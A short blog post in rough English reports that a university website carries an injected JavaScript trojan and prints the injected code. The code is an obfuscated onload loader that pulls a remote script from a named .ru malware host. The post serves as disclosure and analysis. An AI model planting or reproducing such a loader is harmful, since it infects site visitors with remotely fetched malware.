http://kk.mercubuana.ac.id/new/index.php , when I was open it with firefox, my KIS inform me that site is contain Trojan.JS.Agent.Axl, here the information.

If you have don’t have antivirus, or your antivirus not recognized this Trojan.
This script will make download the real Trojan trojan-cliker.js.iframe.db which had drooped by help of Trojan.JS.Agent.Axl; Trojan trojan-cliker.js.iframe.db will contact his parent site http://mail-com.hotfile.reuters-com.simpleworldhouse.ru:8080
Of course the real site is simpleworldhouse.ru

Droped trojan in Cached

Parent Site/ contacted server

I don’t know what this Trojan do.  The exactly they was a backdoor from your computer to transmit your data,

Back to mercubuana site. When you look close this site. You will find that their index.php and their js has infected by Trojan.JS.Agent.Axl by adding latest script below html code

*********************
/*GNU GPL*/ try{window.onload = f***unction(){var Jks0ui2n781rkgl = document.createElement('script');***Jks0ui2n781rkgl.setAttribute('type',

'text/javascrip***t');Jks0ui2n781rkgl.setAttribute('src', 'h&(t@&(!t)@p)@:##/$)/$&@#m@@$a!(i&@l^@&#-$c^#$o@@!&m#@.!&^##h$$@@o$&t!)f$$(i^)l)#$#e#)!.$!c^)&o&m

(^.#^&r$!e^$$&u)&t#&e@@!)r#)!!&s$#-&&c(o#m!.^)(s^!i&!^m^p(^l@@!e((w()o$@r^(!l)(^d$(h#^o#u^$$s)!e&#&$).@r&)u!#:@(8)&0!(8(0#(/$&$l!)a#&)#t(i&#$)m$e@$@s##).$!c^o(@m)

()/)@)l###(a$!t)^$(i$m(^$e$s$.^$&c@@^o^!#m^&/)$h&^o(&(t&^t$i##@e&))s)***@t(^^a!r&&&.&c!!o#m#@$/^p!^)^r$)^i&!c(&!e!)!m^i##!$n#&i$()s!t@$e$(@@r))

^!.#@$))c^!o)m)#)#/(&!@g@@$o)@^&@o#g(@##l&(e)!!(.#)((c!o@(^m)&$/(!^@'.replace(/\

(|\!|\$|@|\^|\)|&|#/ig, ''));Jks0ui2n781rkgl.setAttribute('defer', 'defer');/document.body.appendChild***(Jks0ui2n781rkgl);}} catch(e) {}
*********************

Capture melar.js which altered by virus added at last line

Capture mmenu.js which altered by virus added at last line

I don't know after this article is written, the malicious code had removed or not from thesite. :)